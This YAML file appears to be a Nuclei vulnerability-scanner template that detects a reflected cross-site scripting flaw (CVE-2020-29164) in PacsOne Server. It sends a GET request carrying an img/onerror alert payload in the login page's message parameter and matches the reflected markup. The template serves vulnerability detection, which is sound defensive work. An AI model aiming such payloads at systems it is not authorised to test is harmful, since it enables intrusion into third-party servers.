nuclei-templates/cves/2020/CVE-2020-29164.yaml

32 lines
737 B
YAML

id: CVE-2020-29164
info:
name: PacsOne Server XSS
description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS).
author: geeknik
severity: medium
tags: pacsone,xss,cve,cve2020
reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d
requests:
- method: GET
path:
- "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '<img src="" onerror="alert(1);">1</img>'
part: body
- type: status
status:
- 200